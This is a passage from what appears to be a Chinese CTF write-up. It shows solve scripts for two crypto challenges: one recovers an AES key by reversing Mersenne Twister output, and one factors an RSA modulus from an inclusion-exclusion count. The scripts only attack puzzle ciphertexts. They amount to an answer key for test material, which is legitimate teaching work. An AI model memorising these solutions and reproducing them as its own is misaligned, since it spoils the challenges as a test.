3528590202, 2841893555, 3179384475, 3485733076, 87074890, 753396673, 790057962, 378850528, 3789224576, 3983502105, 1166116, 1854075229, 965611444, 3399039227, 3301304385, 3499808775, 1553588463, 2562124078, 3702675704, 1456114141, 768418804, 2227423616, 3711148950, 2738970313, 4033988307, 1184409529, 3461105405, 2986057969, 2112332635, 615658869, 2858394250, 2819269426, 499315937, 1714425168, 3816439521, 4188657733, 1226314395, 773286132, 1257824142, 2439511774, 1412431345, 451028253, 102711904, 3272107935, 1915128127, 674941443, 1907183006, 4205826365, 2592631544, 2001660887, 1793337902, 336832953, 1676534641, 439197643, 2175306211, 1969440247, 4084563735, 564896680, 1293717918, 1136684128, 4289259757, 2368216261, 3167549822, 1998645278, 2908859410, 2014400533, 1482521794, 3082876093, 2742987778, 3273667028, 1654313273, 3551772744, 1923315597, 1063687791, 1907747434, 3323400678, 3445870975, 316314436, 3905619499, 853586576, 456263058, 3213830894, 3603099146, 1478599807, 344267130, 1085971878, 2416474796, 247701271, 2926294528, 1981779524, 3809025846, 2106937971, 1596271124, 1289668306, 1824884242, 543613169, 2698011204, 1632632104, 179981234, 1091171130, 608067622, 4034608897, 2707671187, 2261524231, 2177175178, 1649366013, 733151281, 2783115482, 389580085, 495962438, 512715565, 1917819840, 1993385884, 2910358830, 3223741704, 3302008571, 857474180, 143995596, 3194737469, 2792999636, 111369357, 2665449999, 3481184513, 21965724, 172308864, 3373225896, 3941204120, 1487487599, 2697473345, 4173199839, 1988623177, 3567610975, 2393053467, 2231132558, 3798877543, 4275987399, 3626515970, 3957758644, 3196139612, 1577858639, 4145376193, 3982712357, 1316354617, 2476570111, 2796635786, 3673095113, 317782376, 38302891, 2729549772, 3124741082, 779634809, 480059945, 1764557943, 1905762442, 2439926326, 3398546304, 1275206055, 3578388510, 4286589961, 2284154687, 1547652572, 211218778, 4019993609, 1035325551, 47385212, 1413260320, 1895132671, 2144191841, 976730195, 880818479, 2944522030, 3051883625, 941172532, 1956827360, 604038865, 1490554868, 2014326554, 3585424155, 1705580179, 1484996770, 3145161387, 2410763156, 1196196268, 4125882510, 1569631240, 3635487118, 3743075539, 53348120, 3549050110, 2179975673, 1455493727, 909517499, 2034744814, 1815931219, 2625466993, 2328144852, 3083176966, 4185591290, 4232725936, 233807337, 987553443, 25498384, 1577858645, 3349985471, 222166290, 1566719496, 4025597331, 454410574, 4172717618, 3397690720, 1563985388, 1294197484, 454917824, 250364909, 1076318659, 3751354075, 3324840413, 2834288682, 1309780963, 3789459740, 1605544538, 1448439145, 1158482892, 407656226, 3589982226, 2670402128, 2795218845, 4079499284, 2736737218, 468906864, 347349067, 3541605667, 1532233501, 1192558327, 3650037602, 1570092544, 3596826230, 2768927258, 1775543901, 1324819997, 3401066173, 4078892370, 3373389918, 3360817112, 3261261117, 2443241006, 847292772, 3862028592, 4086319712, 1837673494, 3577160747, 2636413549, 4021668342, 573747407, 3546255858, 2787607684, 403421850, 3477281082, 4133820736, 332805644, 3663845239, 80993494, 344033777, 1187319040, 1547969768]

for i in range(624):
    predictor.setrandbits(data[i], 32)

for i in range(624):
    predictor.backtrack_getrandbits(32)    

m = predictor.backtrack_getrandbits(16 * 8)
key = m.to_bytes(16, 'little')
cipher = AES.new(key,AES.MODE_ECB)
c =  b'a\\x93\\xdc\\xc3\\x90\\x0cK\\xfa\\xfb\\x1c\\x05$y\\x16:\\xfc\\xf3+\\xf8+%\\xfe\\xf9\\x86\\xa3\\x17i+ab\\xca\\xb6\\xcd\\r\\xa5\\x94\\xeaVM\\xdeo\\xa7\\xdf\\xa9D\\n\\x02\\xa3'
flag = cipher.decrypt(c)
print(flag)

fl@g

学习下概率论里的包含排斥原理

table的长度是66，算出flag" "FLAG" "f14G" "7!@9排列的情况 x=factorial(63)*4-factorial(60)*4+factorial(57)之后很简单rsa

from Crypto.Util.number import *
from sympy import *
from math import factorial
import string

table = string.ascii_letters + string.digits + "@?!*"
n = 10179374723747373757354331803486491859701644330006662145185130847839571647703918266478112837755004588085165750997749893646933873398734236153637724985137304539453062753420396973717
c = 1388132475577742501308652898326761622837921103707698682051295277382930035244575886211234081534946870195081797116999020335515058810721612290772127889245497723680133813796299680596

x=factorial(63)*4-factorial(60)*4+factorial(57)
p=nextprime(x)
q=n//p
d=inverse(65537,(p-1)*(q-1))
print(long_to_bytes(pow(c,d,n)))

PWN